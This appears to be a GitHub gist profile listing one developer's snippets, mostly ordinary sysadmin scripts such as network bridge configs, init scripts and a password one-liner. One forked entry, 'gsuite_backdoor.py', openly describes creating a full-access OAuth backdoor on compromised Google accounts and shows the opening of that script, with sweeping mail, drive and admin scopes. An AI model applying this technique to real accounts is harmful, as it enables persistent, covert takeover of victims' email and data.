Skip to content

Instantly share code, notes, and snippets.

View Oneiroi's full-sized avatar
:shipit:

David Busby Oneiroi

:shipit:
View GitHub Profile
@Oneiroi
Oneiroi / gist:1276622
Created October 10, 2011 21:35
CentOS single nic bridge
put this in ifcfg-br0 :
DEVICE=br0
TYPE=Bridge
BOOTPROTO=static
IPADDR=xxx.xxx.xxx.xxx
NETMASK=xxx.xxx.xxx.xxx
GATEWAY=xxx.xxx.xxx.xxx
ONBOOT=yes
DELAY=0
@Oneiroi
Oneiroi / wordpress_importer.rb
Created February 9, 2012 17:41 — forked from stammy/wordpress_importer.rb
Import a WordPress database and generate markdown files for Jekyll
# based on the import script by icebreaker, which is based on mojombo's
# https://github.com/mojombo/jekyll/blob/master/lib/jekyll/migrators/wordpress.rb
# https://gist.github.com/303570
# edited to rewrite image URLs to use my CloudFront URL
require 'rubygems'
require 'sequel'
require 'fileutils'
require 'yaml'
@Oneiroi
Oneiroi / edge.sh
Created March 6, 2012 13:25
n2n sysvinit scripts
#!/bin/bash
# Author: David Busby <david.busby@psycle.com>
### BEGIN INIT INFO
# Provides: edge
# Required-Start: $supernode
# Required-Stop:
# Default-Start: 3 5
# Default-Stop: 0 1 2 6
@Oneiroi
Oneiroi / osx-aeolus-deps.sh
Created March 19, 2012 22:56
Aeolus @ OSX, Note: using homebrew + ruby version 1.9.3-p0
#!/bin/bash
BREW_RUBY_BIN="/usr/local/Cellar/ruby/1.9.3-p0/bin/"
echo "--- installing pre-requsite gems"
echo "rails
haml
nokogiri
will_paginate
deltacloud-client
simple-navigation
rest-client
@Oneiroi
Oneiroi / reminder.sh
Created May 18, 2012 10:27
Quick n dirty reminder for OSX
#!/bin/bash
/usr/bin/osascript <<-EOF
tell application "System Events"
activate
display dialog "DO STUFF NOW!"
end tell
EOF
Mirror of https://zerobin.net/?06dae5d45335d2b4#m8FRD5qfMgH1rxjVH4oAjHvOMxJArCGp9UIogpmsnHg= (Since remove)
Pulled from https://archive.fo/5Vbc9
Reddit thread https://www.reddit.com/r/netsec/comments/5mw510/discussion_of_a_new_potential_exploit_for_openssl/
Original text now follows:
I'm glad more people are in here now. It gets much, much worse than this.
The post below literally says "if you have the password, you can generate the key and open the file.
@Oneiroi
Oneiroi / gsuite_backdoor.py
Created November 2, 2017 13:45 — forked from ustayready/gsuite_backdoor.py
Quickly create a full-access backdoor on Google accounts by creating a Google API project at https://cloud.google.com/console, save the client_secrets.json into the same folder and then run the script below. It will print a URL for you to access with a browser that has the compromised Google account session active so you can authorize the applic…
#!/usr/bin/env python
import os
from oauth2client import client, tools
from oauth2client.file import Storage
SCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'
def get_credentials():
credential_dir =os.getcwd()
client_secret_path = os.path.join(credential_dir, 'client_secrets.json')
@Oneiroi
Oneiroi / Unsolved crypto challenge since 2015-11-26
Last active December 4, 2017 10:29
This crypto challenege of my own devising has gone unsolved since I created it on 2015-11-26, can you recover the flag ?
596f7527766520676f7420736f6d6520776f726b206168656164206f6620796f753a20546d56346443427a644756774f6941304d545a6a4e6d51325a6a637a4e7a51794d4463304e6a67324e5463794e6a557a595449774e4745304e6a55304e444d304d544d324e474d314d44526d4e5455314d5451334e4463314f54526a4e4759304e5451794e5745304e7a52694e546b30597a51314e4455304d6a4d794e4463314d544d794e474d314e4451324e5445314d5451314e544d304f5451304e5467305a5451324e5463304e7a55354e446b304e44517a4e4759314e6a4d304e544d304d544d324e474d314d44526d4e5455314d5451334e444d304f5451304e5445305a5451324e5467304f4451354e446b304e4455794e4759314e6a55344e5467304f5456684e4745304d54526b4e4755314f4455334e446b31595452684d7a49304e5451784e5745304e4451784e475130595455324e4463304e5455354e5451304e54526c4e5449305a5452684e4449304d5455324e4463314d7a51794e475530596a4d314e4749304e54526b4d32517a5a444e6b
@Oneiroi
Oneiroi / 44con_talks_watch.sh
Last active August 9, 2018 09:12
44con talks page watch
#!/bin/bash
OS=`uname`
URL44CON="https://44con.com/44con/44con-2018/44con-2018-schedule/"
#SET this to rickroll or w/e just make sure your speakers are on full volume
YTALERT="https://www.youtube.com/watch?v=H91rPIq2mN4"
if [ "Darwin" == "${OS}" ]; then
BROWSER="open";
elif [ "Linux" == "${OS}" ]; then
@Oneiroi
Oneiroi / rand_pass.py
Last active August 23, 2018 16:16 — forked from bergantine/gist:1119284
Python Random Password Generator (One Liner). #python #password
python -c "from string import printable; from random import choice; print ''.join([choice(printable) for i in range(32)])"